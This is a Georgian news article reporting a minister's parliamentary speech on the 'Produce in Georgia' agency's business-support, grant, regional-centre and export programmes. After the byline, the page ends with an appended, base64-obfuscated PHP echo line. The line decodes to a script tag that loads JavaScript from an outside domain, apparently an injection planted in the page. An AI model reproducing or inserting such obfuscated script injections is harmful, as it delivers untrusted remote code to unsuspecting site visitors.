celsiusi
ავერსი შნაიდერი

მცირე და საშუალო ბიზნესის განვითარების შემდგომი ხელშეწყობის კუთხით, სააგენტო „აწარმოე საქართველოში“ სხვადასხვა ახალ ინიციატივაზე მუშაობს, – ამის შესახებ ვიცე-პრემიერმა, ეკონომიკისა და მდგრადი განვითარების მინისტრმა, ლევან დავითაშვილმა პარლამენტში, „მინისტრის საათის“ ფორმატში სიტყვით გამოსვლისას განაცხადა.

მინისტრის ინფორმაციით, აქტიურად მიმდინარეობს მუშაობა დაფინანსების ალტერნატიული წყაროების განვითარებაზე, მათ შორის ობლიგაციების გამოშვებაზე, სააქციო კაპიტალის განვითარებასა და აქტივებზე დაფუძნებულ დაფინანსებაზე.

„კერძო სექტორის ხელშეწყობა და გაძლიერება ჩვენი ეკონომიკური პოლიტიკის ერთ-ერთი მთავარი პრიორიტეტია, რისთვისაც, უკვე წლებია, აქტიურად ვმუშაობთ და რისი მნიშვნელოვანი და აპრობირებული ინსტრუმენტია პროგრამა „აწარმოე საქართველოში“. 2022-2023 წლების განმავლობაში გაფართოვდა ბიზნესის ხელშეწყობის არსებული მექანიზმები – ცვლილებები შეეხო როგორც ფინანსური (სესხის თანადაფინანსება და თანაუზრუნველყოფა), ასევე ტექნიკური ხელშეწყობის პროგრამებს (ექსპორტის ტექნიკური დახმარება). მათი საშუალებით მხარდაჭერილია 1 000-მდე პროექტი და შეიქმნა 10,000-მდე სამუშაო ადგილი. ასევე ხაზგასასმელია, რომ მიკრო და მცირე მეწარმეობის საგრანტო პროგრამის 2023 წლის რაუნდში გამარჯვებულია 1157 პროექტი, გამარჯვებულთა 50.12% ქალი მეწარმეა. ჯამურად, 2014 წლიდან „აწარმოე საქართველოში“ სხვადასხვა პროგრამის ფარგლებში 11 ათასამდე პროექტი დაფინანსდა და შეიქმნა 65 000-ზე მეტი სამუშაო ადგილი“, – აღნიშნა ლევან დავითაშვილმა.

მისივე თქმით, ხაზგასასმელია ის ფაქტი, რომ სააგენტოს მიერ გაცემულ ერთ ლარზე, ბენეფიციარებმა დამატებით 14 ლარის შემოსავალი დააგენერირეს, ამავე ერთი ლარის კონტრიბუცია მთლიან შიდა პროდუქტში 4.2 ლარს შეადგენს, ხოლო ყოველ გაცემულ ერთ ლარზე პროექტის განხორციელებიდან ერთი წლის განმავლობაში ბიუჯეტში გადასახადების სახით 1.5 ლარი შედის.

„სიახლეები გვაქვს მეწარმეებისთვის ადგილობრივ დონეზე ბიზნესის მხარდამჭერი პროგრამების მიწოდების კუთხით – დამუშავდა რეგიონული საკონსულტაციო ცენტრების კონცეფცია და მიმდინარე წელს სატესტო რეჟიმში ფუნქციონირება დაიწყო სამეგრელო-ზემო სვანეთის საკონსულტაციო ცენტრმა ქალაქ ზუგდიდში. ამასთან, მიმდინარეობს აჭარისა და კახეთის ცენტრების გასახსნელად მოსამზადებელი სამუშაოები. აქვე დავაანონსებ – 2023-2024 წლებში ქვეყნის მასშტაბით, „აწარმოე საქართველოში“ საკონსულტაციო ცენტრები, ჯამში, 10 რეგიონსა და დედაქალაქში გაიხსნება“, – აღნიშნა ეკონომიკისა და მდგრადი განვითარების მინისტრმა.

ამასთან, ლევან დავითაშვილის განცხადებით, ბოლო წლებში ინვესტიციების მოზიდვის მიზნით, „აწარმოე საქართველოში“ ფარგლებში შემუშავდა და დაინერგა ინოვაციური მიდგომები, მათ შორის, საზღვარგარეთ წარმომადგენლობითი კომპანიების დაქირავება, ლოკაციების სკაუტებთან მუშაობა და შესაბამისი სფეროს ექსპერტებთან თანამშრომლობა ქვეყნის წარმოჩენის კუთხით. შედეგად, ქვეყნის პოტენციალით დაინტერესდნენ და ოპერირება დაიწყეს მსოფლიოს უმსხვილესმა და მრავალმილიარდიანმა კორპორაციებმა, როგორებიცაა: Girteka, Concentrix, Indorama, Teleperformance და სხვა.

„საექსპორტო ბაზრების დივერსიფიკაციის, არსებულ ბაზრებზე პოზიციების გაუმჯობესებისა და კომპანიების საექსპორტო პოტენციალის გაუმჯობესების მიზნით, სააგენტომ შეიმუშავა ახალი, ექსპორტის სტიმულირების პროგრამა, რაც ითვალისწინებს საწარმოების დახმარებას სერტიფიცირებაში, ბრენდინგსა და საერთაშორისო ქსელში შესვლის მიმართულებით. აღნიშნულ პროგრამაში უკვე ჩართულია ექსპორტზე ორიენტირებული 100 კომპანია. ამასთან, სააგენტო ახორციელებს ექსპორტის მენეჯერთა სასერტიფიკატო კურსს, რომელიც მოიცავს ყველა საკვანძო საკითხს ექსპორტის საბაზისო საკითხებსა და საექსპორტო ოპერაციებზე. 2022-2023 წლებში გადამზადებული ექსპორტის მენეჯერების რაოდენობა 120-ს აღემატება. ჯამურად, მოცემული მხარდამჭერი ინსტრუმენტების გამოყენებით, სააგენტოს ბენეფიციარებში, ჩატარებული კვლევის საფუძველზე, აღინიშნება 30%-ანი ზრდა საერთაშორისო გაყიდვებში“, – განაცხადა ლევან დავითაშვილმა.

ავტორი
მირანდა შურღაია
481
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");